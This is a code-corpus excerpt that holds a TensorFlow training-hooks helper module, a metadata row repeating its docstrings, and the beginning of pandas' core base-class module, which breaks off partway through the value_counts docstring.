# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Hooks helper to return a list of TensorFlow hooks for training by name.
More hooks can be added to this set. To add a new hook, 1) add the new hook to
the registry in HOOKS, 2) add a corresponding function that parses out necessary
parameters.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf # pylint: disable=g-bad-import-order
from official.utils.logs import hooks
from official.utils.logs import logger
from official.utils.logs import metric_hook
# Default tensors to log, mapping each tensor name to itself as label.
_TENSORS_TO_LOG = dict((x, x) for x in ['learning_rate',
                                        'cross_entropy',
                                        'train_ece',
                                        'train_accuracy'])
def get_train_hooks(name_list, use_tpu=False, **kwargs):
    """Factory for getting a list of TensorFlow hooks for training by name.

    Args:
      name_list: a list of strings naming desired hook classes; allowed
        values are the keys in HOOKS.
      use_tpu: Boolean of whether computation occurs on a TPU. This will
        disable hooks altogether.
      **kwargs: a dictionary of arguments to the hooks.

    Returns:
      list of instantiated hooks, ready to be used in a classifier.train call.

    Raises:
      ValueError: if an unrecognized name is passed.
    """
    if not name_list:
        return []

    if use_tpu:
        tf.logging.warning("hooks_helper received name_list `{}`, but a TPU is "
                           "specified. No hooks will be used.".format(name_list))
        return []

    train_hooks = []
    for name in name_list:
        factory = HOOKS.get(name.strip().lower())
        if factory is None:
            raise ValueError('Unrecognized training hook requested: {}'.format(name))
        train_hooks.append(factory(**kwargs))

    return train_hooks
def get_logging_tensor_hook(every_n_iter=100, tensors_to_log=None, **kwargs):  # pylint: disable=unused-argument
    """Function to get LoggingTensorHook.

    Args:
      every_n_iter: `int`, print the values of `tensors` once every N local
        steps taken on the current worker.
      tensors_to_log: List of tensor names or dictionary mapping labels to
        tensor names. If not set, log _TENSORS_TO_LOG by default.
      **kwargs: a dictionary of arguments to LoggingTensorHook.

    Returns:
      A LoggingTensorHook that prints a standard set of tensors to stdout.
    """
    tensors = _TENSORS_TO_LOG if tensors_to_log is None else tensors_to_log
    return tf.train.LoggingTensorHook(tensors=tensors,
                                      every_n_iter=every_n_iter)
def get_profiler_hook(model_dir, save_steps=1000, **kwargs):  # pylint: disable=unused-argument
  """Create a ProfilerHook that writes Chrome-trace timelines.

  Args:
    model_dir: the directory to save the profile traces to.
    save_steps: `int`, write a profile trace every N steps.
    **kwargs: unused; accepted so all hook factories share one signature.

  Returns:
    A tf.train.ProfilerHook whose timelines can be loaded into profiling
    tools like chrome://tracing.
  """
  return tf.train.ProfilerHook(output_dir=model_dir, save_steps=save_steps)
def get_examples_per_second_hook(every_n_steps=100,
                                 batch_size=128,
                                 warm_steps=5,
                                 **kwargs):  # pylint: disable=unused-argument
  """Function to get ExamplesPerSecondHook.

  Args:
    every_n_steps: `int`, print current and average examples per second every
      N steps.
    batch_size: `int`, total batch size used to calculate examples/second from
      global time.
    warm_steps: skip this number of steps before logging and running average.
    **kwargs: a dictionary of arguments to ExamplesPerSecondHook.

  Returns:
    Returns an ExamplesPerSecondHook that logs the current and average number
    of examples processed per second to the benchmark logger.
  """
  # NOTE: the docstring previously claimed a ProfilerHook was returned
  # (copy-paste from get_profiler_hook); the hook actually built is
  # hooks.ExamplesPerSecondHook.
  return hooks.ExamplesPerSecondHook(
      batch_size=batch_size, every_n_steps=every_n_steps,
      warm_steps=warm_steps, metric_logger=logger.get_benchmark_logger())
def get_logging_metric_hook(tensors_to_log=None,
                            every_n_secs=600,
                            **kwargs):  # pylint: disable=unused-argument
  """Function to get LoggingMetricHook.

  Args:
    tensors_to_log: List of tensor names or dictionary mapping labels to tensor
      names. If not set, log _TENSORS_TO_LOG by default.
    every_n_secs: `int`, the frequency for logging the metric. Default to every
      10 mins.
    **kwargs: additional keyword arguments; unused, accepted so all hook
      factories share one signature.

  Returns:
    Returns a LoggingMetricHook that saves tensor values in a JSON format.
  """
  if tensors_to_log is None:
    tensors_to_log = _TENSORS_TO_LOG
  return metric_hook.LoggingMetricHook(
      tensors=tensors_to_log,
      metric_logger=logger.get_benchmark_logger(),
      every_n_secs=every_n_secs)
# A dictionary to map one hook name and its corresponding function
# Registry used by get_train_hooks(): keys are lower-cased hook class names,
# values are the factory functions defined above. Keep keys lower-case since
# lookups lower-case the requested name first.
HOOKS = {
    'loggingtensorhook': get_logging_tensor_hook,
    'profilerhook': get_profiler_hook,
    'examplespersecondhook': get_examples_per_second_hook,
    'loggingmetrichook': get_logging_metric_hook,
}
| official/utils/logs/hooks_helper.py | 6,219 | Function to get ExamplesPerSecondHook.
Args:
every_n_steps: `int`, print current and average examples per second every
N steps.
batch_size: `int`, total batch size used to calculate examples/second from
global time.
warm_steps: skip this number of steps before logging and running average.
**kwargs: a dictionary of arguments to ExamplesPerSecondHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
Function to get LoggingMetricHook.
Args:
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
every_n_secs: `int`, the frequency for logging the metric. Default to every
10 mins.
Returns:
Returns a LoggingMetricHook that saves tensor values in a JSON format.
Function to get LoggingTensorHook.
Args:
every_n_iter: `int`, print the values of `tensors` once every N local
steps taken on the current worker.
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
**kwargs: a dictionary of arguments to LoggingTensorHook.
Returns:
Returns a LoggingTensorHook with a standard set of tensors that will be
printed to stdout.
Function to get ProfilerHook.
Args:
model_dir: The directory to save the profile traces to.
save_steps: `int`, print profile traces every N steps.
**kwargs: a dictionary of arguments to ProfilerHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
Factory for getting a list of TensorFlow hooks for training by name.
Args:
name_list: a list of strings to name desired hook classes. Allowed:
LoggingTensorHook, ProfilerHook, ExamplesPerSecondHook, which are defined
as keys in HOOKS
use_tpu: Boolean of whether computation occurs on a TPU. This will disable
hooks altogether.
**kwargs: a dictionary of arguments to the hooks.
Returns:
list of instantiated hooks, ready to be used in a classifier.train call.
Raises:
ValueError: if an unrecognized name is passed.
Hooks helper to return a list of TensorFlow hooks for training by name.
More hooks can be added to this set. To add a new hook, 1) add the new hook to
the registry in HOOKS, 2) add a corresponding function that parses out necessary
parameters.
This code is adapted from the https://github.com/tensorflow/models/tree/master/official/r1/resnet. ========================================================================================== NAVER’s modifications are Copyright 2020 NAVER corp. All rights reserved. ========================================================================================== Copyright 2017 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== pylint: disable=g-bad-import-order pylint: disable=unused-argument pylint: disable=unused-argument pylint: disable=unused-argument pylint: disable=unused-argument A dictionary to map one hook name and its corresponding function | 3,657 | en | 0.721628 |
"""
Base and utility classes for pandas objects.
"""
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
    """
    Baseclass for various pandas objects.
    """

    # results from calls to methods decorated with cache_readonly get added to _cache
    _cache: dict[str, Any]

    @property
    def _constructor(self):
        """
        Class constructor (for this class it's just `__class__`).
        """
        return type(self)

    def __repr__(self) -> str:
        """
        Return a string representation for a particular object.
        """
        # Should be overwritten by base classes
        return object.__repr__(self)

    def _reset_cache(self, key: str | None = None) -> None:
        """
        Reset cached properties. If ``key`` is passed, only clears that key.
        """
        if not hasattr(self, "_cache"):
            return
        if key is None:
            self._cache.clear()
        else:
            self._cache.pop(key, None)

    def __sizeof__(self) -> int:
        """
        Generates the total memory usage for an object that returns
        either a value or Series of values
        """
        memory_usage = getattr(self, "memory_usage", None)
        if memory_usage:
            mem = memory_usage(deep=True)
            # memory_usage may return a scalar or a per-column Series;
            # collapse the latter with .sum().
            return int(mem if is_scalar(mem) else mem.sum())

        # no memory_usage attribute, so fall back to object's 'sizeof'
        return super().__sizeof__()
class NoNewAttributesMixin:
    """
    Mixin which prevents adding new attributes.

    Prevents additional attributes via xxx.attribute = "something" after a
    call to `self.__freeze()`. Mainly used to prevent the user from using
    wrong attributes on an accessor (`Series.cat/.str/.dt`).

    If you really want to add a new attribute at a later time, you need to use
    `object.__setattr__(self, key, value)`.
    """

    def _freeze(self):
        """
        Prevents setting additional attributes.
        """
        object.__setattr__(self, "__frozen", True)

    # prevent adding any attribute via s.xxx.new_attribute = ...
    def __setattr__(self, key: str, value):
        # _cache is used by a decorator
        # We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
        # because
        # 1.) getattr is false for attributes that raise errors
        # 2.) cls.__dict__ doesn't traverse into base classes
        if getattr(self, "__frozen", False):
            permitted = (
                key == "_cache"
                or key in type(self).__dict__
                or getattr(self, key, None) is not None
            )
            if not permitted:
                raise AttributeError(f"You cannot add any new attribute '{key}'")
        object.__setattr__(self, key, value)
# Marker exception type; the specific contract is defined by the call sites
# elsewhere in pandas that raise it (not visible in this module).
class DataError(Exception):
    pass
# Marker exception type; raised by aggregation-spec validation code
# elsewhere in pandas (not visible in this module).
class SpecificationError(Exception):
    pass
class SelectionMixin(Generic[FrameOrSeries]):
    """
    mixin implementing the selection & aggregation interface on a group-like
    object sub-classes need to define: obj, exclusions
    """

    # The wrapped Series/DataFrame.
    obj: FrameOrSeries
    # Column label(s) chosen via __getitem__, or None meaning "everything".
    _selection: IndexLabel | None = None
    # Column labels to leave out of aggregations (set by subclasses).
    exclusions: frozenset[Hashable]
    _internal_names = ["_cache", "__setstate__"]
    _internal_names_set = set(_internal_names)

    @final
    @property
    def _selection_list(self):
        # Normalize `_selection` to a list so a scalar label can be used
        # for DataFrame-style (2-D) indexing.
        if not isinstance(
            self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
        ):
            return [self._selection]
        return self._selection

    @cache_readonly
    def _selected_obj(self):
        # The object restricted to the current selection; for a Series there
        # is nothing to slice. Cached per instance via cache_readonly.
        if self._selection is None or isinstance(self.obj, ABCSeries):
            return self.obj
        else:
            return self.obj[self._selection]

    @final
    @cache_readonly
    def ndim(self) -> int:
        # Dimensionality of the (possibly column-sliced) object.
        return self._selected_obj.ndim

    @final
    @cache_readonly
    def _obj_with_exclusions(self):
        # Like _selected_obj, but additionally drops the excluded columns
        # when no explicit selection narrows the frame.
        if self._selection is not None and isinstance(self.obj, ABCDataFrame):
            return self.obj[self._selection_list]

        if len(self.exclusions) > 0:
            # equivalent to `self.obj.drop(self.exclusions, axis=1)
            # but this avoids consolidating and making a copy
            return self.obj._drop_axis(
                self.exclusions, axis=1, consolidate=False, only_slice=True
            )
        else:
            return self.obj

    def __getitem__(self, key):
        """
        Select column(s); validation happens here, the actual slicing is
        delegated to the subclass hook ``_gotitem``.
        """
        if self._selection is not None:
            raise IndexError(f"Column(s) {self._selection} already selected")

        if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
            # List-like key: validate all labels up front so the error can
            # name every missing column at once.
            if len(self.obj.columns.intersection(key)) != len(key):
                bad_keys = list(set(key).difference(self.obj.columns))
                raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
            return self._gotitem(list(key), ndim=2)

        elif not getattr(self, "as_index", False):
            # as_index=False groupby: scalar selection still yields a 2-D result.
            if key not in self.obj.columns:
                raise KeyError(f"Column not found: {key}")
            return self._gotitem(key, ndim=2)

        else:
            if key not in self.obj:
                raise KeyError(f"Column not found: {key}")
            subset = self.obj[key]
            ndim = subset.ndim
            return self._gotitem(key, ndim=ndim, subset=subset)

    def _gotitem(self, key, ndim: int, subset=None):
        """
        sub-classes to define
        return a sliced object

        Parameters
        ----------
        key : str / list of selections
        ndim : {1, 2}
            requested ndim of result
        subset : object, default None
            subset to act on
        """
        raise AbstractMethodError(self)

    def aggregate(self, func, *args, **kwargs):
        # Abstract: subclasses implement the actual aggregation.
        raise AbstractMethodError(self)

    agg = aggregate
class IndexOpsMixin(OpsMixin):
"""
Common ops mixin to support a unified interface / docs for Series / Index
"""
# ndarray compatibility
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"] # tolist is not deprecated, just suppressed in the __dir__
)
    @property
    def dtype(self) -> DtypeObj:
        # must be defined here as a property for mypy
        # Abstract: concrete Series/Index implementations override this.
        raise AbstractMethodError(self)
    @property
    def _values(self) -> ExtensionArray | np.ndarray:
        # must be defined here as a property for mypy
        # Abstract: the backing array, overridden by Series/Index.
        raise AbstractMethodError(self)
    def transpose(self: _T, *args, **kwargs) -> _T:
        """
        Return the transpose, which is by definition self.

        Returns
        -------
        %(klass)s
        """
        # Validate numpy-compatible arguments for API parity, then no-op:
        # a 1-D object is its own transpose.
        nv.validate_transpose(args, kwargs)
        return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
"""
Return a tuple of the shape of the underlying data.
"""
return self._values.shape
    def __len__(self) -> int:
        # We need this defined here for mypy
        # Abstract: concrete subclasses supply the real length.
        raise AbstractMethodError(self)
    @property
    def ndim(self) -> int:
        """
        Number of dimensions of the underlying data, by definition 1.
        """
        # Series and Index are always one-dimensional.
        return 1
def item(self):
"""
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
"""
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
    @property
    def nbytes(self) -> int:
        """
        Return the number of bytes in the underlying data.
        """
        # Delegates to the backing ndarray/ExtensionArray.
        return self._values.nbytes
    @property
    def size(self) -> int:
        """
        Return the number of elements in the underlying data.
        """
        # len() of the backing array, not of any index structure.
        return len(self._values)
    @property
    def array(self) -> ExtensionArray:
        """
        The ExtensionArray of the data backing this Series or Index.

        Returns
        -------
        ExtensionArray
            An ExtensionArray of the values stored within. For extension
            types, this is the actual array. For NumPy native types, this
            is a thin (no copy) wrapper around :class:`numpy.ndarray`.

            ``.array`` differs ``.values`` which may require converting the
            data to a different form.

        See Also
        --------
        Index.to_numpy : Similar method that always returns a NumPy array.
        Series.to_numpy : Similar method that always returns a NumPy array.

        Notes
        -----
        This table lays out the different array types for each extension
        dtype within pandas.

        ================== =============================
        dtype              array type
        ================== =============================
        category           Categorical
        period             PeriodArray
        interval           IntervalArray
        IntegerNA          IntegerArray
        string             StringArray
        boolean            BooleanArray
        datetime64[ns, tz] DatetimeArray
        ================== =============================

        For any 3rd-party extension types, the array type will be an
        ExtensionArray.

        For all remaining dtypes ``.array`` will be a
        :class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
        stored within. If you absolutely need a NumPy array (possibly with
        copying / coercing data), then use :meth:`Series.to_numpy` instead.

        Examples
        --------
        For regular NumPy types like int, and float, a PandasArray
        is returned.

        >>> pd.Series([1, 2, 3]).array
        <PandasArray>
        [1, 2, 3]
        Length: 3, dtype: int64

        For extension types, like Categorical, the actual ExtensionArray
        is returned

        >>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
        >>> ser.array
        ['a', 'b', 'a']
        Categories (2, object): ['a', 'b']
        """
        # Abstract: Series/Index provide the concrete backing array.
        raise AbstractMethodError(self)
    def to_numpy(
        self,
        dtype: npt.DTypeLike | None = None,
        copy: bool = False,
        na_value=lib.no_default,
        **kwargs,
    ) -> np.ndarray:
        """
        A NumPy ndarray representing the values in this Series or Index.

        Parameters
        ----------
        dtype : str or numpy.dtype, optional
            The dtype to pass to :meth:`numpy.asarray`.
        copy : bool, default False
            Whether to ensure that the returned value is not a view on
            another array. Note that ``copy=False`` does not *ensure* that
            ``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
            a copy is made, even if not strictly necessary.
        na_value : Any, optional
            The value to use for missing values. The default value depends
            on `dtype` and the type of the array.

            .. versionadded:: 1.0.0

        **kwargs
            Additional keywords passed through to the ``to_numpy`` method
            of the underlying array (for extension arrays).

            .. versionadded:: 1.0.0

        Returns
        -------
        numpy.ndarray

        See Also
        --------
        Series.array : Get the actual data stored within.
        Index.array : Get the actual data stored within.
        DataFrame.to_numpy : Similar method for DataFrame.

        Notes
        -----
        The returned array will be the same up to equality (values equal
        in `self` will be equal in the returned array; likewise for values
        that are not equal). When `self` contains an ExtensionArray, the
        dtype may be different. For example, for a category-dtype Series,
        ``to_numpy()`` will return a NumPy array and the categorical dtype
        will be lost.

        For NumPy dtypes, this will be a reference to the actual data stored
        in this Series or Index (assuming ``copy=False``). Modifying the result
        in place will modify the data stored in the Series or Index (not that
        we recommend doing that).

        For extension types, ``to_numpy()`` *may* require copying data and
        coercing the result to a NumPy type (possibly object), which may be
        expensive. When you need a no-copy reference to the underlying data,
        :attr:`Series.array` should be used instead.

        This table lays out the different dtypes and default return types of
        ``to_numpy()`` for various dtypes within pandas.

        ================== ================================
        dtype              array type
        ================== ================================
        category[T]        ndarray[T] (same dtype as input)
        period             ndarray[object] (Periods)
        interval           ndarray[object] (Intervals)
        IntegerNA          ndarray[object]
        datetime64[ns]     datetime64[ns]
        datetime64[ns, tz] ndarray[object] (Timestamps)
        ================== ================================

        Examples
        --------
        >>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
        >>> ser.to_numpy()
        array(['a', 'b', 'a'], dtype=object)

        Specify the `dtype` to control how datetime-aware data is represented.
        Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
        objects, each with the correct ``tz``.

        >>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
        >>> ser.to_numpy(dtype=object)
        array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
               Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
              dtype=object)

        Or ``dtype='datetime64[ns]'`` to return an ndarray of native
        datetime64 values. The values are converted to UTC and the timezone
        info is dropped.

        >>> ser.to_numpy(dtype="datetime64[ns]")
        ... # doctest: +ELLIPSIS
        array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
              dtype='datetime64[ns]')
        """
        if is_extension_array_dtype(self.dtype):
            # Extension dtypes: delegate entirely (including na_value and
            # any extra keywords) to the ExtensionArray implementation.
            # error: Too many arguments for "to_numpy" of "ExtensionArray"
            return self.array.to_numpy(  # type: ignore[call-arg]
                dtype, copy=copy, na_value=na_value, **kwargs
            )
        elif kwargs:
            # Extra keywords are only meaningful for extension arrays;
            # reject them for plain ndarrays with a TypeError naming one.
            bad_keys = list(kwargs.keys())[0]
            raise TypeError(
                f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
            )

        result = np.asarray(self._values, dtype=dtype)
        # TODO(GH-24345): Avoid potential double copy
        # Copy before filling NAs so the caller's data is never mutated.
        if copy or na_value is not lib.no_default:
            result = result.copy()
            if na_value is not lib.no_default:
                result[self.isna()] = na_value
        return result
@property
def empty(self) -> bool:
return not self.size
    def max(self, axis=None, skipna: bool = True, *args, **kwargs):
        """
        Return the maximum value of the Index.

        Parameters
        ----------
        axis : int, optional
            For compatibility with NumPy. Only 0 or None are allowed.
        skipna : bool, default True
            Exclude NA/null values when showing the result.
        *args, **kwargs
            Additional arguments and keywords for compatibility with NumPy.

        Returns
        -------
        scalar
            Maximum value.

        See Also
        --------
        Index.min : Return the minimum value in an Index.
        Series.max : Return the maximum value in a Series.
        DataFrame.max : Return the maximum values in a DataFrame.

        Examples
        --------
        >>> idx = pd.Index([3, 2, 1])
        >>> idx.max()
        3

        >>> idx = pd.Index(['c', 'b', 'a'])
        >>> idx.max()
        'c'

        For a MultiIndex, the maximum is determined lexicographically.

        >>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
        >>> idx.max()
        ('b', 2)
        """
        # Reject numpy-style arguments we don't support, then reduce.
        nv.validate_minmax_axis(axis)
        nv.validate_max(args, kwargs)
        return nanops.nanmax(self._values, skipna=skipna)
    # NOTE: this docstring is a template; @doc substitutes {op}/{oppose}/{value}
    # here and reuses the same template for argmin below, so the placeholders
    # (and doubled braces) must be preserved verbatim.
    @doc(op="max", oppose="min", value="largest")
    def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
        """
        Return int position of the {value} value in the Series.

        If the {op}imum is achieved in multiple locations,
        the first row position is returned.

        Parameters
        ----------
        axis : {{None}}
            Dummy argument for consistency with Series.
        skipna : bool, default True
            Exclude NA/null values when showing the result.
        *args, **kwargs
            Additional arguments and keywords for compatibility with NumPy.

        Returns
        -------
        int
            Row position of the {op}imum value.

        See Also
        --------
        Series.arg{op} : Return position of the {op}imum value.
        Series.arg{oppose} : Return position of the {oppose}imum value.
        numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
        Series.idxmax : Return index label of the maximum values.
        Series.idxmin : Return index label of the minimum values.

        Examples
        --------
        Consider dataset containing cereal calories

        >>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
        ...                'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
        >>> s
        Corn Flakes              100.0
        Almond Delight           110.0
        Cinnamon Toast Crunch    120.0
        Cocoa Puff               110.0
        dtype: float64

        >>> s.argmax()
        2
        >>> s.argmin()
        0

        The maximum cereal calories is the third element and
        the minimum cereal calories is the first element,
        since series is zero-indexed.
        """
        delegate = self._values
        nv.validate_minmax_axis(axis)
        skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)

        if isinstance(delegate, ExtensionArray):
            # ExtensionArray path: with skipna=False and NAs present the
            # result is defined as -1 rather than an NA position.
            if not skipna and delegate.isna().any():
                return -1
            else:
                return delegate.argmax()
        else:
            # error: Incompatible return value type (got "Union[int, ndarray]", expected
            # "int")
            return nanops.nanargmax(  # type: ignore[return-value]
                delegate, skipna=skipna
            )
    def min(self, axis=None, skipna: bool = True, *args, **kwargs):
        """
        Return the minimum value of the Index.

        Parameters
        ----------
        axis : {None}
            Dummy argument for consistency with Series.
        skipna : bool, default True
            Exclude NA/null values when showing the result.
        *args, **kwargs
            Additional arguments and keywords for compatibility with NumPy.

        Returns
        -------
        scalar
            Minimum value.

        See Also
        --------
        Index.max : Return the maximum value of the object.
        Series.min : Return the minimum value in a Series.
        DataFrame.min : Return the minimum values in a DataFrame.

        Examples
        --------
        >>> idx = pd.Index([3, 2, 1])
        >>> idx.min()
        1

        >>> idx = pd.Index(['c', 'b', 'a'])
        >>> idx.min()
        'a'

        For a MultiIndex, the minimum is determined lexicographically.

        >>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
        >>> idx.min()
        ('a', 1)
        """
        # Reject numpy-style arguments we don't support, then reduce.
        nv.validate_minmax_axis(axis)
        nv.validate_min(args, kwargs)
        return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmin( # type: ignore[return-value]
delegate, skipna=skipna
)
def tolist(self):
"""
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
"""
if not isinstance(self._values, np.ndarray):
# check for ndarray instead of dtype to catch DTA/TDA
return list(self._values)
return self._values.tolist()
to_list = tolist
def __iter__(self):
"""
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
iterator
"""
# We are explicitly making element iterators.
if not isinstance(self._values, np.ndarray):
# Check type instead of dtype to catch DTA/TDA
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
@cache_readonly
def hasnans(self) -> bool:
"""
Return if I have any nans; enables various perf speedups.
"""
return bool(isna(self).any())
    def isna(self):
        # Boolean mask marking missing entries of the underlying values.
        return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
"""
Perform the reduction type operation if we can.
"""
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
    @final
    def _map_values(self, mapper, na_action=None):
        """
        An internal function that maps values using the input
        correspondence (which can be a dict, Series, or function).

        Parameters
        ----------
        mapper : function, dict, or Series
            The input correspondence object
        na_action : {None, 'ignore'}
            If 'ignore', propagate NA values, without passing them to the
            mapping function

        Returns
        -------
        Union[Index, MultiIndex], inferred
            The output of the mapping function applied to the index.
            If the function returns a tuple with more than one element
            a MultiIndex will be returned.
        """
        # we can fastpath dict/Series to an efficient map
        # as we know that we are not going to have to yield
        # python types
        if is_dict_like(mapper):
            if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
                # If a dictionary subclass defines a default value method,
                # convert mapper to a lookup function (GH #15999).
                dict_with_default = mapper
                mapper = lambda x: dict_with_default[x]
            else:
                # Dictionary does not have a default. Thus it's safe to
                # convert to an Series for efficiency.
                # we specify the keys here to handle the
                # possibility that they are tuples

                # The return value of mapping with an empty mapper is
                # expected to be pd.Series(np.nan, ...). As np.nan is
                # of dtype float64 the return value of this method should
                # be float64 as well
                mapper = create_series_with_explicit_dtype(
                    mapper, dtype_if_empty=np.float64
                )

        if isinstance(mapper, ABCSeries):
            # Since values were input this means we came from either
            # a dict or a series and mapper should be an index
            if is_categorical_dtype(self.dtype):
                # use the built in categorical series mapper which saves
                # time by mapping the categories instead of all values
                cat = cast("Categorical", self._values)
                return cat.map(mapper)

            # Align by positional lookup of our values in the mapper's index.
            values = self._values

            indexer = mapper.index.get_indexer(values)
            new_values = algorithms.take_nd(mapper._values, indexer)

            return new_values

        # we must convert to python types
        if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
            # GH#23179 some EAs do not have `map`
            values = self._values
            if na_action is not None:
                raise NotImplementedError
            map_f = lambda values, f: values.map(f)
        else:
            values = self._values.astype(object)
            if na_action == "ignore":
                # NOTE: the lambda parameter deliberately shadows `values`;
                # it is invoked as map_f(values, mapper) below.
                map_f = lambda values, f: lib.map_infer_mask(
                    values, f, isna(values).view(np.uint8)
                )
            elif na_action is None:
                map_f = lib.map_infer
            else:
                msg = (
                    "na_action must either be 'ignore' or None, "
                    f"{na_action} was passed"
                )
                raise ValueError(msg)

        # mapper is a function
        new_values = map_f(values, mapper)

        return new_values
    def value_counts(
        self,
        normalize: bool = False,
        sort: bool = True,
        ascending: bool = False,
        bins=None,
        dropna: bool = True,
    ):
        """
        Return a Series containing counts of unique values.

        The resulting object will be in descending order so that the
        first element is the most frequently-occurring element.
        Excludes NA values by default.

        Parameters
        ----------
        normalize : bool, default False
            If True then the object returned will contain the relative
            frequencies of the unique values.
        sort : bool, default True
            Sort by frequencies.
        ascending : bool, default False
            Sort in ascending order.
        bins : int, optional
            Rather than count values, group them into half-open bins,
            a convenience for ``pd.cut``, only works with numeric data.
        dropna : bool, default True
            Don't include counts of NaN.

        Returns
        -------
        Series

        See Also
        --------
        Series.count: Number of non-NA elements in a Series.
        DataFrame.count: Number of non-NA elements in a DataFrame.
        DataFrame.value_counts: Equivalent method on DataFrames.

        Examples
        --------
        >>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
        >>> index.value_counts()
        3.0    2
        1.0    1
        2.0    1
        4.0    1
        dtype: int64

        With `normalize` set to `True`, returns the relative frequency by
        dividing all values by the sum of values.

        >>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
        >>> s.value_counts(normalize=True)
        3.0    0.4
        1.0    0.2
        2.0    0.2
        4.0    0.2
        dtype: float64

        **bins**

        Bins can be useful for going from a continuous variable to a
        categorical variable; instead of counting unique
        apparitions of values, divide the index in the specified
        number of half-open bins.

        >>> s.value_counts(bins=3)
        (0.996, 2.0]    2
        (2.0, 3.0]      2
        (3.0, 4.0]      1
